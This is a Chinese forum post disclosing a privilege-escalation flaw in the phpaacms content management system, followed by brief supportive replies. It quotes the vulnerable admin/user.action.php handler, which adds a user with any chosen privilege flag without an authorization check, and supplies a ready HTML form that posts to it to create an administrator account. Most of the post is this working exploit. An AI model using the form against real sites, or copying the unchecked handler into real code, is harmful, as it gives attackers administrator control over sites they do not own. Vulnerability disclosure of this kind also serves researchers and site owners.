phpaacms(不是phpcms)越权添加管理员
这个cms是我在站长网下的,是我第一次挖到的漏洞,但也是目前第一个,可能是好高骛远,刚有个个小的就去挖有防御机制的了,之前在别的论坛发过,但论坛人多帖子多,不回复,看过的没过100人就沉了,这次期中考试花了我差不多一个月时间,一分钟网都没上过,有种要被封的危机感,无奈又发出来了
代码:
//admin/user.action.php
<?php
header('Content-Type: text/html; charset=utf-8');
require_once ("global.php");
$act = $_POST ['act'];
if ($act=='add') {
if(empty($_POST['username'])){
exit("<script>alert('用户名不能为空!');window.history.go(-1)</script>");
}
if(empty($_POST['password'])){
exit("<script>alert('密码不能为空!');window.history.go(-1)</script>");
}
if($_POST['password']!=$_POST['password2']){
exit("<script>alert('两次密码输入不一致!');window.history.go(-1)</script>");
}
if(check_username($_SESSION['username'])){
exit("<script>alert('用户 ".$_POST['username']." 已经存在!');window.history.go(-1)</script>");
}
$record = array(
'username' =>$_POST ['username'],
'password' =>md5($_POST ['password']),
'userflag' =>$_POST ['userflag']
);
$id = $db->save('phpaadb_users',$record);
header("Location: user.php");
}
?>
<html>
<body>
<form action="/admin/user.action.php" method="post">
act: <input type="text" name="act" value="add" />
username: <input type="text" name="username" />
password: <input type="text" name="password" />
password2: <input type="text" name="password2" />
<input type="submit" />
</form>
</body>
</html>
评论44次
支持,已经收藏
支持原创,赞一下
这个是不是没有验证?
支持原创,感谢分享
这个CMS名字很容易看成phpcms
没有验证权限?
这个有点意思
直接加用户了?
可以直接添加吧,不用这么麻烦
被标题xi引进来 发现不是phpcms 。。。
支持,支持!!!
支持原创0DAY,越多越好,哈哈
支持原创。。。
支持一下!~
支持一下,感谢分享
支持一下,感谢分享
支持原创挖洞
支持一下楼主,再接再厉
我还没有挖过呢
多谢~~